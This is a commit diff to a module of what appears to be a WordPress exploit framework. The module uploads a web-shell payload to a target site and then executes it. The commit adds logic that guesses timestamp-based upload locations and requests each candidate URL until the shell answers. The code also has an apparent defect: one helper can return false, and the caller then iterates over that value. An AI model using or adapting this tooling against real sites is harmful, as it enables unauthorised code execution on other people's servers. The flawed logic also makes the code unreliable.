Add support for multiple possible upload locations and upload timestamps

rastating · rastating · commit bbe7595337e2 · 2017-11-12T20:58:38.000Z
diff --git a/lib/wpxf/wordpress/shell_upload.rb b/lib/wpxf/wordpress/shell_upload.rb
@@ -51,6 +51,11 @@ def uploaded_payload_location
     nil
   end
 
+  # @return [Array] an array of possible locations that the payload could have been uploaded to.
+  def possible_payload_upload_locations
+    nil
+  end
+
   # Called prior to preparing and uploading the payload.
   # @return [Boolean] true if no errors occurred.
   def before_upload
@@ -86,12 +91,10 @@ def run
     emit_info 'Uploading payload...'
     return false unless upload_payload(builder)
 
-    payload_url = uploaded_payload_location
-    return false unless payload_url
-    emit_success "Uploaded the payload to #{payload_url}", true
-
     emit_info 'Executing the payload...'
-    execute_payload(payload_url)
+    validate_and_prepare_upload_locations.each do |payload_url|
+      break if execute_payload(payload_url)&.code != 404
+    end
 
     true
   end
@@ -103,22 +106,49 @@ def validate_upload_result
 
   # Execute the payload at the specified address.
   # @param payload_url [String] the payload URL to access.
+  # @return [HttpResponse] the HTTP response of the request to the payload URL.
   def execute_payload(payload_url)
     res = execute_get_request(url: payload_url, cookie: @session_cookie)
     emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
+    res
+  end
+
+  # @return [Integer] the number of seconds to adjust the upload timestamp range start and end values by.
+  def timestamp_range_adjustment_value
+    10
+  end
+
+  # @return [Array] the range of possible timestamps that could have been used when the payload reached the target.
+  def upload_timestamp_range
+    (@start_timestamp - timestamp_range_adjustment_value)..(@end_timestamp + timestamp_range_adjustment_value)
   end
 
   private
 
+  def validate_and_prepare_upload_locations
+    payload_urls = possible_payload_upload_locations
+    return payload_urls unless payload_urls.nil?
+
+    payload_url = uploaded_payload_location
+    return false unless payload_url
+
+    emit_success "Uploaded the payload to #{payload_url}", true
+    [].push(payload_url)
+  end
+
   def payload_name_length
     normalized_option_value('payload_name_length')
   end
 
   def upload_payload(builder)
+    @start_timestamp = Time.now.to_i
+
     builder.create do |body|
       @upload_result = execute_post_request(url: uploader_url, params: upload_request_params, body: body, cookie: @session_cookie)
     end
 
+    @end_timestamp = Time.now.to_i
+
     if @upload_result.nil? || @upload_result.timed_out?
       emit_error 'No response from the target'
       return false
